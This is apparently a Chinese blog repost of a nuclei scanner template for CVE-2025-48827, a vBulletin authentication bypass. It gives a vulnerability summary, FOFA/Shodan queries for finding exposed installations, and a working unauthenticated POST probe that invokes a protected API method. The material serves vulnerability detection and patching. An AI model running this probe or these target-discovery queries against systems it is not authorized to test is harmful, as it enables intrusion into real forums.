vBulletin 500-603 - Authentication Bypass

漏洞信息

漏洞名称: vBulletin 5.0.0-6.0.3 - Authentication Bypass

漏洞编号:

  • CVE: CVE-2025-48827

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: vBulletin是一个广泛使用的论坛软件,支持多种功能如用户管理、内容发布和社区互动,常见于企业和个人网站中。该软件在5.0.0至5.7.5版本以及6.0.0至6.0.3版本中存在一个认证绕过漏洞。此漏洞的根源在于PHP 8.1或更高版本中,ReflectionMethod::invoke()及其类似方法的内部调整,默认允许通过PHP的Reflection API调用受保护或私有的方法,导致未认证的攻击者可以远程调用受保护的API控制器方法。这种漏洞的存在使得攻击者无需认证即可执行任意系统命令,以web服务器用户的身份完全控制系统。由于漏洞的严重性和易利用性,它被评级为严重级别。攻击者可以利用此漏洞进行远程代码执行,导致数据泄露、服务中断等严重后果。为了防范此类攻击,建议用户升级到vBulletin 6.0.4或更高版本,并在升级前不要使用PHP 8.1或更高版本。

产品厂商: vbulletin

产品名称: vbulletin

影响版本: 5.0.0 <= version <= 5.7.5, 6.0.0 <= version <= 6.0.3

搜索语法: app=”vBulletin”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/24af829b88b707025dd10c5acce97e7d577496a6/http%2Fcves%2F2025%2FCVE-2025-48827.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains_all(body,'<div class=','ad_{{rand_value}}_inner','{{rand_string}}')
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
vBulletin 500-603 - Authentication Bypass
http://example.com/2025/07/09/github_1732297384/
作者
lianccc
发布于
2025年7月9日
许可协议